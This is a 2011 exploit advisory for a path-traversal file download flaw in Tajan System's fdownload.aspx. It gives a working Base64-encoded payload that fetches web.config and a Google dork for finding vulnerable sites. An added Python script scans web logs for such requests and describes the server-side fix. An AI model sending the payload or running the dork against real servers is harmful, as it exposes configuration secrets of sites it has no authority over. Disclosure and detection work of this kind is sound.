++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Author : St493r
[#] Contact : St493r@gmail.com
[#] Title : Tajan System Arbitrary File Download Vulnerability
[#] Tested On : Linux
[#] Date : 28 - 09 - 2011
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Vulnerability File : /misc/fdownload.aspx

[#] Exploit :
fdownload.aspx downloads files from a directory 3 levels below the root directory, so to download web.config we should go back 3 directories and then encode our path in Base64.

[#] Example :
Download web.config :
/../../../web.config = Ly4uLy4uLy4uL3dlYi5jb25maWc=
/misc/fdownload.aspx?dp=Ly4uLy4uLy4uL3dlYi5jb25maWc=

You can download any file from your target ;)

Google dork : inurl:/misc/fdownload.aspx
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Thanks To All Iranian Hackers
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
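
For reviewing web server logs for this issue, the following added example (not part of the original advisory) Base64-decodes the dp parameter of requests to /misc/fdownload.aspx and flags values whose decoded path climbs above the download directory. The quoted request-line log layout, the sample log lines and all function names are assumptions made for this illustration.

```python
import base64, binascii, re
from urllib.parse import urlsplit, parse_qsl

ENDPOINT = "/misc/fdownload.aspx"  # vulnerable path named in the advisory
SAMPLE_LOG = [  # constructed log lines; 192.0.2.0/24 is a documentation range
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /misc/fdownload.aspx?dp=cmVwb3J0cy9xMy5wZGY= HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:07 +0000] "GET /misc/fdownload.aspx?dp=Ly4uLy4uLy4uL3dlYi5jb25maWc= HTTP/1.1" 200 2048',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /misc/fdownload.aspx?DP=Li5cLi5cd2ViLmNvbmZpZw HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.aspx HTTP/1.1" 200 900',
]

def decode_dp(value):
    """Base64-decode a dp value; return None if it is not valid Base64."""
    value = value.replace(" ", "+")       # parse_qsl turned '+' into ' '
    value += "=" * (-len(value) % 4)      # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def escapes_base(path):
    """True if the path climbs above the directory it starts in."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):  # Windows accepts both separators
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def scan(lines):
    """Return (line_no, decoded_or_raw_value, verdict) for suspicious dp values."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|HEAD|POST) (\S+)', line)
        url = urlsplit(m.group(1) if m else "")
        if url.path.lower() != ENDPOINT:
            continue
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == "dp":       # ASP.NET query keys are case-insensitive
                decoded = decode_dp(raw)
                if decoded is None:
                    findings.append((no, raw, "undecodable"))
                elif escapes_base(decoded):
                    findings.append((no, decoded, "traversal"))
    return findings

if __name__ == "__main__": print(*scan(SAMPLE_LOG), sep="\n")
```

The same depth check, applied to the decoded value before the file is opened, is the server-side fix: reject any dp whose path leaves the download directory.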